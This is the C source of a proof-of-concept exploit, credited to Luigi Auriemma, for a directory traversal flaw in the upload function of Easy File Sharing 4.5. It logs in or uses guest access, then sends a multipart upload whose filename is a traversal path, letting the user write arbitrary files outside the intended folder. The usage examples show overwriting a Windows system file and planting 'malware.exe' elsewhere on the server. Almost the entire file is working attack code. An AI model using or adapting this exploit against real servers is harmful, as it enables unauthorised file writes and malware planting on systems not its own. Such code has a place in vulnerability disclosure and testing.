/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include "mydownlib.h"

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER     "0.1"
#define UPLOAD0 "Content-Type: multipart/form-data; boundary=---------------------------%u"
#define UPLOAD1 "-----------------------------%u\r\n" \
                "Content-Disposition: form-data; name=\"uploadid\"\r\n" \
                "\r\n" \
                "\r\n" \
                "-----------------------------%u\r\n" \
                "Content-Disposition: form-data; name=\"upload_title\"\r\n" \
                "\r\n" \
                "description\r\n" \
                "-----------------------------%u\r\n" \
                "Content-Disposition: form-data; name=\"UploadedFile\"; filename=\"%s\"\r\n" \
                "Content-Type: application/octet-stream\r\n" \
                "\r\n"
#define UPLOAD2 "\r\n" \
                "-----------------------------%u\r\n" \
                "Content-Disposition: form-data; name=\"Upload\"\r\n" \
                "\r\n" \
                "Upload\r\n" \
                "-----------------------------%u--\r\n"



u8 *fdload(u8 *fname, int *fsize);
void std_err(void);



int main(int argc, char *argv[]) {
    mydown_options  opt;
    u32     len,
            seed;
    int     fsize,
            ret;
    u8      tmp[100],
            *content,
            *data,
            *arg1,
            *host,
            *user,
            *pass,
            *lfile,
            *dfile,
            *folder,
            *end,
            *fdata;

    setbuf(stdout, NULL);

    fputs("\n"
        "Easy File Sharing 4.5 upload directory traversal "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 6) {
        printf("\n"
            "Usage: %s <URL> <user> <pass> <local_file> <dest_file>\n"
            "\n"
            "Example:\n"
            "  http://127.0.0.1/folder myuser mypass file.txt ../../../windows/win.ini\n"
            "  http://127.0.0.1/forum.ghp?forumid=1 \"\" \"\" malware.exe ../../dir/file.exe\n"
            "\n"
            "The user must have upload access to that folder so you can use for example his\n"
            "default folder (http://server/username) or just the forum as in the examples\n"
            "user the \"\" username for avoiding login (guest access)\n"
            "\n", argv[0]);
        exit(1);
    }

    arg1  = argv[1];
    user  = argv[2];
    pass  = argv[3];
    lfile = argv[4];
    dfile = argv[5];

    folder = strrchr(arg1, '/');
    if(folder && (strlen(folder) == 1)) {
        *folder = 0;
        folder = strrchr(arg1, '/');
    }
    if(!folder) {
        printf("\nError: you have not specified a correct URL: http://server/folder\n");
        exit(1);
    }
    *folder++ = 0;

    host = malloc(strlen(arg1) + strlen(folder) + 32);
    strcpy(host, arg1);
    end = host + strlen(host);

    printf("- host:          %s\n", host);
    printf("- upload folder: %s\n", folder);

    fdata = fdload(lfile, &fsize);
    content = malloc(sizeof(UPLOAD1) + strlen(dfile) + fsize + sizeof(UPLOAD2) + 200);
    if(!content) std_err();

    memset(&opt, 0, sizeof(opt));
    opt.verbose     = -1;
    opt.filedata    = (void *)&data;
    opt.content     = content;
    opt.ret_code    = &ret;
    opt.get         = "POST";
    opt.more_http   = "Content-type: application/x-www-form-urlencoded";

    if(user[0]) {
        printf("- login\n");
        strcpy(end, "/forum.ghp");
        sprintf(content, "frmLogin=true&frmUserName=%s&frmUserPass=%s&login=Login%%21", user, pass);

        len = mydown(host, NULL, &opt);
        if(len == MYDOWN_ERROR) goto quit;

        data[len - 1] = 0;
        if(strstr(data, "Invalid username or password")) {
            printf("\nError: Invalid username or password\n");
            exit(1);
        }
        free(data);
    }

    seed = (time(NULL) * 0x343FD) + 0x269EC3;
    sprintf(tmp, UPLOAD0, seed);

    len = sprintf(content, UPLOAD1, seed, seed, seed, dfile);
    memcpy(content + len, fdata, fsize);
    len += fsize;
    len += sprintf(content + len, UPLOAD2, seed, seed);

    opt.more_http   = tmp;
    opt.contentsize = len;

    printf("- upload file\n");
    sprintf(end, "/%s", folder);

    len = mydown(host, NULL, &opt);
    if(len == MYDOWN_ERROR) goto quit;

    data[len - 1] = 0;
    if(strstr(data, "do not have permission")) {
        printf("X upload failed, seems you have not the right permissions OR\n"
               "  the file already exists and you can't overwrite it due to server's config\n");
        if(!strstr(folder, "forum")) printf("  try uploading the file on the forum if it's available\n");
    } else {
        printf("- upload finished\n");
    }
    free(data);

    free(fdata);
    free(content);
    return(0);
quit:
    printf("\nError: something wrong (return code %d)\n", ret);
    return(1);
}



u8 *fdload(u8 *fname, int *fsize) {
    struct stat xstat;
    FILE    *fd;
    u8      *buff;

    printf("- load %s\n", fname);
    fd = fopen(fname, "rb");
    if(!fd) std_err();
    fstat(fileno(fd), &xstat);
    buff = malloc(xstat.st_size);
    fread(buff, 1, xstat.st_size, fd);
    fclose(fd);
    *fsize = xstat.st_size;
    return(buff);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}


